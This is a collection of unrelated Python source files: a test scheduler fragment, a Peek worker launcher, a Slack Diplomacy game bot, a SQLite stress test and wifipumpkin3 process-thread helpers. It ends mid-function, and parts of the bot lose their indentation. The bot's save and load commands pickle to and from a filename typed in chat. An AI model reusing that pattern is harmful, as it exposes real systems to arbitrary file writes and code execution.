            True when any reported task has failed so far.
        """
        error = False
        # untagged (sequential) tasks are chained, then scheduled like concurrent ones
        seqtasks = list(filter(lambda x: not x.isConcurrent and not x.isParallel, taskList))
        contasks = list(filter(lambda x: x.isConcurrent or x.isParallel, taskList))
        seqtasks = self.__transformSeqTasks(seqtasks)
        alltasks = contasks + seqtasks
        self.__print(f"all tasks: {[t.name for t in alltasks]}")
        workerThread = threading.Thread(target=self.runWorkerThread,kwargs={'taskList':alltasks})
        workerThread.start()
        workerThread.join()
        # NOTE(review): this inspects the cumulative report, so a failure in an
        # earlier phase also flags this phase — confirm that is intended.
        if len(list(filter(lambda x: "failed" in x["status"], self.taskReport))) > 0:
            error = True
        return error
    def __feedbackSchemaFromTaskResult(self,task: Task, scenarioResult: ScenarioResult,status: str, error: str, elapsed: float):
        """Merge task fields, the outcome, and the (optional) scenario result
        into a ScenarioFeedback payload for the feedback adapters."""
        obj = ScenarioFeedback()
        taskDict = asdict(task)
        feedDict = asdict(obj)
        # copy every field shared between Task and ScenarioFeedback
        obj = ScenarioFeedback(**{k:(taskDict[k] if k in taskDict else v) for k,v in feedDict.items()})
        obj.status = status
        obj.error = error
        obj.elapsed = elapsed
        if scenarioResult:
            obj.threadId = scenarioResult.threadId
            obj.pid = scenarioResult.pid
            obj.name = scenarioResult.scenario["name"]
            obj.column = scenarioResult.scenario["location"]["column"]
            obj.line = scenarioResult.scenario["location"]["line"]
            obj.tags = [t["name"] for t in scenarioResult.scenario["tags"]]
            obj.description = scenarioResult.scenario["description"]
            obj.numberOfSteps = len(scenarioResult.scenario["steps"])
            if scenarioResult.startTime:
                obj.startTime = scenarioResult.startTime
            if scenarioResult.endTime:
                obj.endTime = scenarioResult.endTime
        if task.feature:
            obj.featureInfo = FeatureInfo(
                description=task.feature["description"],
                name=task.feature["name"],
                tags=[t["name"] for t in task.feature["tags"]]
            )
        return obj
    def generateTimeline(self, outputFilename="timeline_output.html"):
        """Write an HTML timeline of the executed tasks."""
        timeline = Timeline()
        timeline.generateTimeline(self.taskReport, outputFilename)
    def generateDependencyGraph(self, outputFilename="dependency_output.html"):
        """Write an HTML visualisation of the task/group dependency graph."""
        depGraph = DependencyGraph()
        depGraph.generateGraph(outputFilename,self.taskReport,self.groups)
    def generateReport(self, outputFilename="report_output.html"):
        """Write the full HTML test report."""
        report = Report()
        report.generateReport(self.taskReport, self.testResult, outputFilename)
    def registerFeedbackAdapter(self,adapter: FeedbackAdapter):
        """Subscribe an adapter to receive live scenario feedback events."""
        self.feedback.addAdapter(adapter)
    def generateJUnitReport(self, outputFilename="junit_output.xml"):
        """Write a JUnit-style XML report (e.g. for CI integration)."""
        report = JUnitReport()
        report.generateReport(self.taskReport,self.testResult, outputFilename)
|
run_peek_worker.py | #!/usr/bin/env python
"""
Copyright Synerty Pty Ltd 2013
This software is proprietary, you are not free to copy
or redistribute this code in any format.
All rights to this software are reserved by
Synerty Pty Ltd
"""
import logging
import threading
from threading import Thread
from peek_platform import PeekPlatformConfig
from peek_platform.util.LogUtil import setupPeekLogger, updatePeekLoggerHandlers, \
setupLoggingToSysloyServer
from peek_plugin_base.PeekVortexUtil import peekWorkerName, peekServerName
from pytmpdir.Directory import DirSettings
from twisted.internet import reactor, defer
from txhttputil.site.FileUploadRequest import FileUploadRequest
from vortex.DeferUtil import vortexLogFailure
from vortex.VortexFactory import VortexFactory
setupPeekLogger(peekWorkerName)
logger = logging.getLogger(__name__)
def setupPlatform():
    """Configure the Peek platform singletons for the worker component.

    Must run before twistedMain()/celeryMain(): wires the install managers,
    plugin loader, config, logging, reactor thread pool and celery app.
    """
    from peek_platform import PeekPlatformConfig
    PeekPlatformConfig.componentName = peekWorkerName
    # Tell the platform classes about our instance of the pluginSwInstallManager
    from peek_worker.sw_install.PluginSwInstallManager import PluginSwInstallManager
    PeekPlatformConfig.pluginSwInstallManager = PluginSwInstallManager()
    # Tell the platform classes about our instance of the PeekSwInstallManager
    from peek_worker.sw_install.PeekSwInstallManager import PeekSwInstallManager
    PeekPlatformConfig.peekSwInstallManager = PeekSwInstallManager()
    # Tell the platform classes about our instance of the PeekLoaderBase
    from peek_worker.plugin.WorkerPluginLoader import WorkerPluginLoader
    PeekPlatformConfig.pluginLoader = WorkerPluginLoader()
    # The config depends on the componentName, order is important
    from peek_worker.PeekWorkerConfig import PeekWorkerConfig
    PeekPlatformConfig.config = PeekWorkerConfig()
    # Update the version in the config file
    from peek_worker import __version__
    PeekPlatformConfig.config.platformVersion = __version__
    # Set default logging level
    logging.root.setLevel(PeekPlatformConfig.config.loggingLevel)
    updatePeekLoggerHandlers(PeekPlatformConfig.componentName,
                             PeekPlatformConfig.config.loggingRotateSizeMb,
                             PeekPlatformConfig.config.loggingRotationsToKeep,
                             PeekPlatformConfig.config.logToStdout)
    if PeekPlatformConfig.config.loggingLogToSyslogHost:
        setupLoggingToSysloyServer(PeekPlatformConfig.config.loggingLogToSyslogHost,
                                   PeekPlatformConfig.config.loggingLogToSyslogPort,
                                   PeekPlatformConfig.config.loggingLogToSyslogFacility)
    # Enable deferred debugging if DEBUG is on.
    if logging.root.level == logging.DEBUG:
        defer.setDebugging(True)
    # If we need to enable memory debugging, turn that on.
    if PeekPlatformConfig.config.loggingDebugMemoryMask:
        from peek_platform.util.MemUtil import setupMemoryDebugging
        setupMemoryDebugging(PeekPlatformConfig.componentName,
                             PeekPlatformConfig.config.loggingDebugMemoryMask)
    # The worker doesn't need any threads
    reactor.suggestThreadPoolSize(1)
    # Initialise the txhttputil Directory object
    DirSettings.defaultDirChmod = PeekPlatformConfig.config.DEFAULT_DIR_CHMOD
    DirSettings.tmpDirPath = PeekPlatformConfig.config.tmpPath
    FileUploadRequest.tmpFilePath = PeekPlatformConfig.config.tmpPath
    # Configure the celery app in the worker
    # This is not the worker that will be started, it allows the worker to queue tasks
    from peek_platform.ConfigCeleryApp import configureCeleryApp
    from peek_platform import PeekPlatformConfig
    from peek_plugin_base.worker.CeleryApp import celeryApp
    configureCeleryApp(celeryApp, PeekPlatformConfig.config)
def twistedMain():
    """Connect to the Peek server, load/start all plugins, then run the
    twisted reactor (this call blocks in the calling thread)."""
    # defer.setDebugging(True)
    # sys.argv.remove(DEBUG_ARG)
    # import pydevd
    # pydevd.settrace(suspend=False)
    # Make the agent restart when the server restarts, or when it looses connection
    def restart(status):
        from peek_platform import PeekPlatformConfig
        PeekPlatformConfig.peekSwInstallManager.restartProcess()
    (VortexFactory.subscribeToVortexStatusChange(peekServerName)
     .filter(lambda online: online == False)
     .subscribe(on_next=restart)
     )
    # First, setup the VortexServer Worker
    from peek_platform import PeekPlatformConfig
    d = VortexFactory.createTcpClient(PeekPlatformConfig.componentName,
                                      PeekPlatformConfig.config.peekServerHost,
                                      PeekPlatformConfig.config.peekServerVortexTcpPort)
    d.addErrback(vortexLogFailure, logger, consumeError=True)
    # Software update check is not a thing any more
    # Start Update Handler,
    # Add both, The peek client_fe_app might fail to connect, and if it does, the payload
    # sent from the peekSwUpdater will be queued and sent when it does connect.
    # d.addBoth(lambda _: peekSwVersionPollHandler.start())
    # Load all Plugins
    d.addBoth(lambda _: logger.info("Loading all Peek Plugins"))
    d.addBoth(lambda _: PeekPlatformConfig.pluginLoader.loadCorePlugins())
    d.addBoth(lambda _: PeekPlatformConfig.pluginLoader.loadOptionalPlugins())
    d.addBoth(lambda _: logger.info("Starting all Peek Plugins"))
    d.addBoth(lambda _: PeekPlatformConfig.pluginLoader.startCorePlugins())
    d.addBoth(lambda _: PeekPlatformConfig.pluginLoader.startOptionalPlugins())
    # Log Exception, convert the errback to callback
    d.addErrback(vortexLogFailure, logger, consumeError=True)
    # Log that the reactor has started
    d.addCallback(lambda _:
                  logger.info('Peek Worker is running, version=%s',
                              PeekPlatformConfig.config.platformVersion))
    # Unlock the mutex so main() may start celery once the plugins are loaded
    d.addCallback(lambda _: twistedPluginsLoadedMutex.release())
    d.addErrback(vortexLogFailure, logger, consumeError=True)
    # Run the reactor in this thread (blocks until reactor.stop())
    reactor.callLater(0, logger.info, "Reactor started")
    reactor.run(installSignalHandlers=False)
def celeryMain():
    """Start the celery worker (blocks until celery shuts down)."""
    from peek_platform import PeekPlatformConfig
    # Load all Plugins
    logger.info("Starting Celery")
    from peek_worker import CeleryApp
    CeleryApp.start(PeekPlatformConfig.config)
# Create the startup mutex, twisted has to load the plugins before celery starts.
twistedPluginsLoadedMutex = threading.Lock()
# Acquire unconditionally rather than via `assert`: under `python -O` asserts
# are stripped, so the lock would never be taken and celery could start
# before the plugins finished loading.
twistedPluginsLoadedMutex.acquire()
def setPeekWorkerRestarting():
    """Flag (via a module-level global) that the worker is restarting."""
    # NOTE(review): peekWorkerRestarting has no module-level default, so
    # readers must guard with getattr() until this has been called — confirm.
    global peekWorkerRestarting
    peekWorkerRestarting = True
def main():
    """Worker entry point: run twisted in a background thread, celery in this
    one, then either restart the process or shut both down cleanly."""
    setupPlatform()
    # Initialise and run all the twisted stuff in another thread.
    twistedMainLoopThread = Thread(target=twistedMain)
    twistedMainLoopThread.start()
    # Block until twisted has released it's lock (plugins loaded)
    twistedPluginsLoadedMutex.acquire()
    # Start the celery blocking main thread
    celeryMain()
    logger.info("Celery has shutdown")
    # Shutdown the Vortex
    VortexFactory.shutdown()
    if PeekPlatformConfig.peekSwInstallManager.restartTriggered:
        logger.info("Restarting Peek Worker")
        PeekPlatformConfig.peekSwInstallManager.realyRestartProcess()
    else:
        # Tell twisted to stop
        logger.info("Shutting down twisted reactor.")
        reactor.callFromThread(reactor.stop)
        # Wait for twisted to stop
        twistedMainLoopThread.join()
        logger.info("Reactor shutdown complete.")
        PeekPlatformConfig.pluginLoader.stopCorePlugins()
        PeekPlatformConfig.pluginLoader.stopOptionalPlugins()
        PeekPlatformConfig.pluginLoader.unloadCorePlugins()
        PeekPlatformConfig.pluginLoader.unloadOptionalPlugins()
        logger.info("Worker Service shutdown complete.")
# Script entry point.
if __name__ == '__main__':
    main()
|
diplomacyBot.py | import re
import time
import random
import pickle
import threading
from diplomacyMap import Map
from diplomacyLogic import *
from slackclient import SlackClient
from slackbot_settings import API_TOKEN, DIPLOMACY_CHANNEL
RTM_READ_DELAY = 0 # 1 second delay between reading from RTM
MENTION_REGEX = "^<@(|[WU].+?)>(.*)"
class diplomacyBot():
    def __init__(self):
        """Wire up the Slack client, reset all game state, then enter the
        bot's main loop (self.run(), defined elsewhere in this class)."""
        self.diplomacy = DIPLOMACY_CHANNEL
        self.sc = SlackClient(API_TOKEN)
        self.bot_id = None          # presumably filled in by run() — confirm
        self.current = None         # channel the message being handled came from
        self.starting = False      # True while player registration is open
        self.running = False       # True once a game is underway
        self.season = "SPRING"
        self.date = 1901
        self.resolving = False     # True while retreat orders are collected
        self.players={}
        # country id -> country name; ids 1-7 are assigned randomly at start
        self.countries = {1: "Russia",
                          2: "England",
                          3: "Germany",
                          4: "France",
                          5: "Austria",
                          6: "Italy",
                          7: "Turkey"}
        # country id -> list of pending standardized orders
        self.orders = { 1:[],2:[],3:[],4:[],5:[],6:[],7:[]}
        self.ready = {}
        # NOTE: this blocks — run() is the bot's message read loop.
        self.run()
#============================= Messaging
    def send(self,message):
        """Post `message` to the channel the current command came from."""
        self.sc.api_call(
            "chat.postMessage",
            channel=self.current,
            text=message,
            as_user="true")
    def im(self, player, message):
        """Send a direct message to `player` (a Slack user id)."""
        # Ensure an IM conversation with the user exists.
        self.sc.api_call(
            "conversations.open",
            users=player,
            return_im="true")
        # NOTE(review): posts with channel=player (the user id) rather than
        # the conversation id returned above — appears to rely on Slack
        # accepting user ids as a channel here; confirm.
        self.sc.api_call(
            "chat.postMessage",
            channel=player,
            text=message,
            as_user="true")
def showMap(self, player, mapname):
self.sc.api_call(
"files.upload",
channels=player,
as_user="true",
filename=mapname,
file=open(mapname, 'rb'))
#============================= User Interface
    def start(self):
        """Handle the Start command: the first call opens registration in the
        diplomacy channel, the second locks registration and begins play."""
        try:
            info = self.sc.api_call("channels.info",channel=self.current)
            if(info['channel']['id'] != self.diplomacy):
                self.send("This isn't the diplomacy channel")
                return
        except KeyError:
            # api_call response had no 'channel' key (e.g. DM or API error)
            self.send("This isn't the diplomacy channel")
            return
        if(self.starting == False):
            # first Start: open registration and register the sender
            self.send("@channel A new game of Diplomacy is starting...\n"
                      "Message \"@bender add me\" if you want to join the game\n"
                      "Message \"@bender Start\" when all members have registered and you are ready to play\n"
                      "Message \"@bender help\" if you need a list of all available commands")
            self.starting = True
            self.map = Map()
            self.addPlayer()
        else:
            # second Start: lock registration and begin play
            self.starting = False
            self.running = True
            self.send("Starting Game...")
            if(len(self.players) > 7):
                self.send("Too many players for this game. Quitting...")
                self.starting = False
                self.running = False
                return
            playerstr = "Players are "+"".join([str(self.players[i][0])+", " for i in self.players])
            self.send(playerstr[:-2])
            self.randomizeCountries()
            self.springFall()
            # DM each player their country, starting units and order syntax
            for i in self.players:
                ctry = self.players[i][1]
                self.im(i,"Your country is "+str(self.countries[ctry]))
                unitLocs = "Your units are: "+ "".join([str(j[0])+", " for j in self.map.getUnitsByCountry(ctry)])
                #send map
                #self.showMap(i, "diplomacy_map.png")
                self.im(i,unitLocs[:-2])
                self.im(i,"Send orders here, so they are private.\n Valid orders are in form [unit type] [location of unit] [action] [location of action or second unit] [second unit action] [location of second unit action]")
    def addPlayer(self):
        """Register the message sender as a player during the signup phase."""
        info = self.sc.api_call("users.info",user=self.sender)
        if(self.starting == False):
            self.send("A game is not in the regristration phase at the moment.")
            return
        if(self.sender not in self.players):
            self.players[self.sender] = [str(info['user']['name']),""] #string username, countryID, ready for adj
            self.send("Added player: "+str(info['user']['name']))
        else:
            self.send("You cannot be in the same game twice")
def randomizeCountries(self):
assign = random.sample(range(1,8),len(self.players))
it = 0
for i in self.players:
self.players[i][1] = assign[it]
self.ready[assign[it]] = False
it += 1
#print(self.players)
#============================== Needs Work
    def show(self, opt = None):#needs to implement map generation with the map library
        """Upload a map image to the current channel.

        The second char of self.command[1] picks the variant: M/U shows the
        units map, L the labeled map; anything else (including the internal
        opt="map" calls) regenerates and shows the units map.
        """
        if(opt): self.command = opt
        if(self.command[1][0] == "M" or self.command[1][0] == "U"):
            self.map.saveMap("current_units.png")
            self.showMap(self.current, "current_units.png")
        elif(self.command[1][0] == "L"):
            self.showMap(self.current, "labeledMap.png")
        else:
            self.map.getMap()
            self.map.saveMap("current_units.png")
            self.showMap(self.current, "current_units.png")
    def playerReady(self):
        """Toggle the sender's ready flag; adjudicate early once everyone is
        ready."""
        ctry = self.players[self.sender][1]
        # a command starting with "N" means "Not ready"
        if(self.command[0][0] == "N"):
            self.ready[ctry] = False
        else:
            self.ready[ctry] = True
        if(all(ready == True for ready in self.ready.values())):
            # force the announcement into the main diplomacy channel
            self.current = self.diplomacy
            self.adjudicate()
def help(self):
self.im(self.current,"Available Commands: Start, Add Me, Ready, Not Ready, Adjudicate, Show Map, Show Labels, Save, Load, Verify\n"
"Start: Starts new game. The first start command begins player registration, the second begins the game.\n"
"Add me: Registers the sender as a player in the starting game.\n"
"Ready/NotReady: If all players are ready, the game adjudicates before the timer and without manual coordination.\n"
"Adjudicate: Progresses a season and resolves movement/retreat/creation orders.\n"
"Show Map: Shows map with units."
"Show Labels: Shows map with territory labels and no units.\n"
"Save <filename>: Saves game state as <filename>.\n"
"Load <filename>: Loads game state from <filename>.\n"
"Verify: Repeats back orders a player input for manual verification.")
    def win(self): #ties not implemented yet
        """End the game if any player controls 18 or more supply depots."""
        for i in self.players:
            ctry = self.players[i][1]
            supplyDepots = len(self.map.getOwnedSupplyDepots(ctry))
            if(supplyDepots >= 18):
                self.running = False
                self.send("Game Over! The winner is "+self.countries[ctry])
                return
def save(self):
#if(self.resolving == True):
# self.im(self.current, "Please resolve the current season before saving.")
# return
try:
filename = self.command[1]
gameState = (self.map, self.players, self.orders, self.resolving, self.season, self.date)
pickle.dump(gameState, open(filename, "wb"))
self.send("Game state saved as: "+str(filename))
except IndexError:
self.im(self.current,"You need to specify a filename to save as.")
#except:
# self.im(self.current,"Game state failed to save.")
def load(self):
try:
filename = self.command[1]
gameState = pickle.load(open(filename,"rb"))
self.map, self.players, self.orders, self.resolving, self.season, self.date = gameState
self.starting = False
self.running = True
self.send("Loading Game "+str(filename)+"...")
if(self.season == "WINTER"):
self.winter()
else:
self.springFall()
except IndexError:
self.im(self.current,"You need to specify a filename to load or specify a filename a game was saved as.")
#except:
# self.im(self.current,"Game state failed to load.")
#============================== Game movement interface
def standardizeOrder(self, cmd):
typ = loc1 = act1 = loc2 = act2 = loc3 = None
try:
typ = cmd[0][0]
loc1 = cmd[1]
act1 = cmd[2][0]
loc2 = cmd[3]
act2 = cmd[4][0]
loc3 = cmd[5]
except IndexError: pass
if(act1 == "M" or act1 == "A"):
act1 = "-"
if(act2 == "M" or act2 == "A"):
act2 = "-"
return list(filter(None,[typ,loc1,act1,loc2,act2,loc3]))
def ordered(self):
ctry = self.players[self.sender][1]
idx = 0
for i in self.orders[ctry]:
if(i[1] == self.command[1]):
del self.orders[ctry][idx]
idx += 1
self.command = self.standardizeOrder(self.command)
self.orders[ctry].append(self.command[:])
#print(self.orders[ctry])
self.send("Added standardized order: "+" ".join(self.command))
def verify(self):
ctry = self.players[self.sender][1]
ordrs = "Your entered orders are:\n "
for i in self.orders[ctry]:
ordrs += " ".join(i)+"\n"
#print(ordrs)
self.im(self.sender, ordrs[:])
def springFall(self):
    """Announce a Spring/Fall phase to the channel.

    Outside resolution, asks for movement orders; during resolution,
    asks for retreat orders and DMs each player owning a dislodged
    unit.  NOTE(review): self.retreats items are iterated as
    (unit, location) pairs and the unit exposes .controllerID --
    confirm against the movement resolver.
    """
    season_name = self.season.lower().capitalize()
    self.show(opt="map")
    if self.resolving == False:
        self.send("The " + season_name + " " + str(self.date) + " season is starting")
        self.send("Send in your movement orders at this time.")
        return
    self.send("The " + season_name + " " + str(self.date) + " season is ending")
    self.send("Send in your retreat orders at this time.")
    self.send("Sending an invalid order will cause the unit to be destroyed.")
    for unit, location in self.retreats:
        self.im(unit.controllerID, "Your unit at " + location + " needs to retreat")
def winter(self):
    """Announce the Winter adjustment phase.

    Computes each country's build/destroy allowance via the
    module-level build() helper, checks the victory condition, then
    DMs every player their build or destroy instructions.  The
    allowance table is stashed on self.unitsToBuild for the resolver.
    """
    allowances = build(self.players, self.map)
    self.win()  # Check if win conditions are met
    self.show(opt="map")
    self.send("The " + self.season.lower().capitalize() + " " + str(self.date) + " season is starting")
    self.send("Send in your unit creation/destruction orders at this time.")
    for player in self.players:
        country = self.players[player][1]
        delta = allowances[country]
        if delta > 0:
            self.im(player, "You need to build " + str(delta) + " units. You can only build them on your home supply depots.")
            self.im(player, "Type [unit type] [spawn location] to order unit creation. The spawn location must be unoccupied.")
        elif delta == 0:
            self.im(player, "You have no units to build or destroy.")
        else:
            self.im(player, "You need to destroy " + str(-1 * delta) + " units.")
            self.im(player, "Type [unit type] [location] to order unit destruction.")
    self.unitsToBuild = allowances
#=============================== Game Logic
#self.command[Type, location1, action1, location2, action2, location3]
def adjudicate(self):
    """Resolve the current phase and advance the season state machine.

    SPRING and FALL each run in two calls: first movement resolution
    (move() may produce required retreats, entering "resolving" mode),
    then retreat resolution.  WINTER likewise runs announcement then
    build/destroy resolution, after which the year advances and all
    orders are cleared.  Note the deliberate plain `if` (not `elif`)
    before the WINTER branch: a Fall phase with no retreats falls
    straight through into the Winter announcement within this same call.
    """
    # Adjudication is only allowed from the shared diplomacy channel.
    if(self.current != self.diplomacy):
        self.send("Adjudication must happen in the diplomacy channel.")
        return
    # Every player must re-ready for the next phase.
    self.ready = dict.fromkeys(self.ready,False)
    if(self.season == "SPRING"):
        if(self.resolving == False):
            # move() applies movement orders; returns dislodged units.
            self.retreats = move(self.map,self.orders)
            self.resolving = True
            if(self.retreats == []):
                # Nothing to retreat: skip straight to Fall.
                self.resolving = False
                self.season = "FALL"
            self.springFall() #tells players to send in retreat orders if resolving, else announces next season
        else:
            retreat(self.orders,self.retreats) #handles retreat orders
            self.season = "FALL"
            self.resolving = False
            self.springFall()
    elif(self.season == "FALL"):
        if(self.resolving == False):
            self.retreats = move(self.map,self.orders)
            self.resolving = True
            if(self.retreats == []):
                self.resolving = False
                self.season = "WINTER"
                # self.springFall()
        else:
            retreat(self.orders,self.retreats) #handles retreat orders
            self.season = "WINTER"
            self.resolving = False
            # self.springFall()
    # Intentionally not elif: Fall may have just rolled into Winter above.
    if(self.season == "WINTER"):
        if(self.resolving == False):
            self.winter()
            self.resolving = True
        else:
            resolveWinterOrders(self.players,self.map,self.orders,self.unitsToBuild)
            self.season = "SPRING"
            self.date += 1
            self.resolving = False
            # Fresh, empty order lists for the seven countries.
            self.orders = {1:[],2:[],3:[],4:[],5:[],6:[],7:[]}
#=============================== Event Loop and Bones
def handle_command(self, cmd, channel, sender):
    """Dispatch one incoming chat command to its handler(s).

    Stashes channel, sender and the upper-cased token list on self
    (the handlers read these instead of taking arguments), then fires
    every registered handler whose command prefix matches.  Handlers
    only run while a game is starting (lobby commands), while one is
    running, or for the always-available START/HELP/LOAD.
    """
    self.viableCommands = {
        "START": self.start,
        "ADD ME": self.addPlayer,
        "READY": self.playerReady,
        "NOT READY": self.playerReady,
        "HELP": self.help,
        "F ": self.ordered,
        "A ": self.ordered,
        "ADJUDICATE": self.adjudicate,
        "VERIFY": self.verify,
        "SAVE": self.save,
        "LOAD": self.load,
        "SHOW": self.show,
    }  # list of commands
    # Context for the handlers, which can't receive arguments through
    # the dispatch dictionary.
    self.current = channel
    self.sender = sender
    self.command = cmd.upper().split()
    upper = cmd.upper()
    matched = False
    for prefix, handler in self.viableCommands.items():
        if not upper.startswith(prefix):
            continue
        matched = True
        lobby_ok = self.starting == True and prefix in ["START", "ADD ME"]
        always_ok = prefix in ["START", "HELP", "LOAD"]
        if lobby_ok or self.running == True or always_ok:
            handler()
        else:
            self.send("A game is not currently starting")
    if not matched:
        self.send("I do not understand that command")
def parse_bot_commands(self, slack_events):
    """Scan Slack RTM events for a command addressed to this bot.

    Returns (message, channel, user) for the first plain message event
    that either @-mentions the bot or arrives in a direct-message
    channel (channel ids starting with "D") from someone else.
    Returns (None, None, None) when no such event is present.
    """
    for event in slack_events:
        # Skip anything that is not a plain user message.
        if event["type"] != "message" or "subtype" in event:
            continue
        user_id, message = self.parse_direct_mention(event["text"])
        if user_id == self.bot_id:
            return message, event["channel"], event["user"]
        if event["channel"][0] == "D" and self.bot_id != event["user"]:
            return event["text"], event["channel"], event["user"]
    return None, None, None
def parse_direct_mention(self, message_text):
    """Split a "<@UID> rest" message into (UID, rest).

    Uses the module-level MENTION_REGEX; group 1 is the mentioned user
    id, group 2 the remainder.  Returns (None, None) when the text
    contains no direct mention.
    """
    match = re.search(MENTION_REGEX, message_text)
    if match is None:
        return (None, None)
    return (match.group(1), match.group(2).strip())
def run(self):
    """Main event loop: connect to Slack RTM and poll for bot commands.

    Blocks forever once connected.  Each command is handled
    synchronously on this thread (the threaded dispatch below is
    commented out), so a slow handler delays subsequent reads.
    """
    if self.sc.rtm_connect(with_team_state=False):
        print("Starter Bot connected and running!")
        # Cache the bot's own user id so @-mentions of it can be matched.
        self.bot_id = self.sc.api_call("auth.test")["user_id"]
        while True:
            command, channel, user = self.parse_bot_commands(self.sc.rtm_read())
            if command:
                # t = threading.Thread(target=self.handle_command, args=(command, channel, user))
                # t.start()
                self.handle_command(command, channel, user)
            # Throttle RTM polling (RTM_READ_DELAY is a module constant).
            time.sleep(RTM_READ_DELAY)
    else:
        print("Connection failed. Exception traceback printed above.")
if __name__ == "__main__":
    # NOTE(review): run() is never called here -- presumably the
    # diplomacyBot constructor starts the event loop itself; confirm
    # against the class __init__ defined earlier in this file.
    bot = diplomacyBot()
|
test.py | #!/usr/bin/python
# stress test the sqlite writing with several threads
from multiprocessing import Process, Lock, current_process
def proc_func(lock, counter):
    """Worker process: endlessly insert Person/Address rows into SQLite.

    Each process builds its own SQLAlchemy engine/session (engines must
    not be shared across fork).  NOTE(review): `counter` is a plain int
    passed by value, so every process increments its own private copy --
    the lock does not make it a shared counter.  Use a
    multiprocessing.Value if a global count is actually wanted.
    """
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    from sqlalchemy_declarative import Address, Base, Person
    # 30s busy-timeout so concurrent writers wait for the file lock
    # instead of failing immediately with "database is locked".
    engine = create_engine('sqlite:///sqlalchemy_example.db', connect_args={'timeout': 30})
    Base.metadata.bind = engine
    DBSession = sessionmaker(bind=engine)
    session = DBSession()
    while True:
        # BUGFIX: `with lock` releases even if an exception interrupts the
        # critical section (the bare acquire/release pair did not).
        with lock:
            counter += 1
        # BUGFIX: parenthesized print works on both Python 2 and 3; the
        # original `print '...'` statement is a SyntaxError on Python 3.
        print('[%s] adding person %d' % (current_process().name, counter))
        # Insert a Person in the person table
        new_person = Person(name='new person %d' % counter)
        session.add(new_person)
        session.commit()
        # Insert an Address in the address table
        new_address = Address(post_code='00000 %d' % counter, person=new_person)
        session.add(new_address)
        session.commit()
# One lock shared by both workers; guards the counter bump (which is
# per-process anyway -- see the note in proc_func).
lock = Lock()
counter = 0
# Start two writer processes. They loop forever and are never joined,
# so this stress test must be stopped manually (Ctrl-C / kill).
for num in range(2):
    Process(target=proc_func, args=(lock, counter)).start()
threads.py | import logging
import socket
from os import kill
import signal
from multiprocessing import Process, Queue
from subprocess import Popen, STDOUT, PIPE
from PyQt5.QtCore import QThread, pyqtSignal, pyqtSlot, QProcess, QObject
from wifipumpkin3.core.packets.dhcpserver import DHCPProtocol
from wifipumpkin3.core.utility.printer import display_messages, colors
from wifipumpkin3.core.common.platforms import Linux as Refactor
import wifipumpkin3.core.utility.constants as C
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class DHCPServerProcess(QThread):
    """Runs the DHCP server command in a child multiprocessing.Process
    and relays its stdout lines to Qt listeners via _ProcssOutput.

    NOTE(review): this class is re-defined later in this module; the
    later definition shadows this one, so this copy is effectively
    dead code.
    """

    # Emitted once per line of the child's combined stdout/stderr.
    _ProcssOutput = pyqtSignal(object)

    def __init__(self, cmd, directory_exec=None):
        QThread.__init__(self)
        self.directory_exec = directory_exec  # not used here; kept for API parity
        self.cmd = cmd  # argv list for the DHCP server command

    def standardProcOutput(self, q):
        # Runs inside the child Process: pump each output line into q.
        with Popen(
            self.cmd, bufsize=1, stdout=PIPE, stderr=STDOUT, universal_newlines=True
        ) as p:
            for line in p.stdout:
                q.put(line)

    def run(self):
        # QThread body: start the worker process, then forward queued lines.
        self.queue = Queue()
        self.started = True
        self.procDHCP = Process(target=self.standardProcOutput, args=(self.queue,))
        self.procDHCP.start()
        print("[New Thread {} ({})]".format(self.procDHCP.pid, self.objectName()))
        while self.started:
            # NOTE(review): queue.get() blocks, so after stop() this loop
            # only exits when one more item arrives or the queue is closed.
            self._ProcssOutput.emit(self.queue.get())

    def getpid(self):
        """ return the pid of current process in background"""
        return self.procDHCP.pid

    def getID(self):
        """ return the name of process in background"""
        return self.objectName()

    def stop(self):
        print("Thread::[{}] successfully stopped.".format(self.objectName()))
        self.procDHCP.terminate()
        self.started = False
        self.queue.close()
class ProcessThread(QThread):
    """Runs an external command inside a QProcess and forwards its
    merged stdout/stderr to Qt listeners via the _ProcssOutput signal.

    `cmd` is a one-entry mapping {executable: [args]}.
    """

    # Emitted with each chunk of decoded process output.
    _ProcssOutput = pyqtSignal(object)

    def __init__(self, cmd, directory_exec=None):
        QThread.__init__(self)
        self.directory_exec = directory_exec  # optional working directory
        self.cmd = cmd

    @pyqtSlot()
    def getNameThread(self):
        return "[New Thread {} ({})]".format(self.procThread.pid(), self.objectName())

    def readProcessOutput(self):
        # Decode whatever the child wrote (tools here emit ASCII).
        self.data = str(self.procThread.readAllStandardOutput(), encoding="ascii")
        self._ProcssOutput.emit(self.data)

    def getpid(self):
        """ return the pid of current process in background"""
        return self.procThread.pid()

    def getID(self):
        """ return the name of process in background"""
        return self.objectName()

    def start(self):
        self.procThread = QProcess(self)
        self.procThread.setProcessChannelMode(QProcess.MergedChannels)
        if self.directory_exec:
            self.procThread.setWorkingDirectory(self.directory_exec)
        # BUGFIX: connect the output handler BEFORE starting the process.
        # The original connected after start(), so output produced before
        # the connection existed could go unreported.
        self.procThread.readyReadStandardOutput.connect(self.readProcessOutput)
        self.procThread.start(
            list(self.cmd.keys())[0], self.cmd[list(self.cmd.keys())[0]]
        )
        print("[New Thread {} ({})]".format(self.procThread.pid(), self.objectName()))

    def stop(self):
        print("Thread::[{}] successfully stopped.".format(self.objectName()))
        if hasattr(self, "procThread"):
            self.procThread.terminate()
            self.procThread.waitForFinished()
            self.procThread.kill()
class DHCPServerProcess(QThread):
    """Duplicate definition of DHCPServerProcess; being later in the
    module, it shadows the first one.

    Runs the DHCP server command in a child multiprocessing.Process and
    forwards each stdout line through the _ProcssOutput signal.
    """

    # Emitted once per line of the child's combined stdout/stderr.
    _ProcssOutput = pyqtSignal(object)

    def __init__(self, cmd, directory_exec=None):
        QThread.__init__(self)
        self.directory_exec = directory_exec  # unused; kept for API parity
        self.cmd = cmd  # argv list for the DHCP server command

    def standardProcOutput(self, q):
        # Runs inside the child Process: stream output lines into q.
        with Popen(
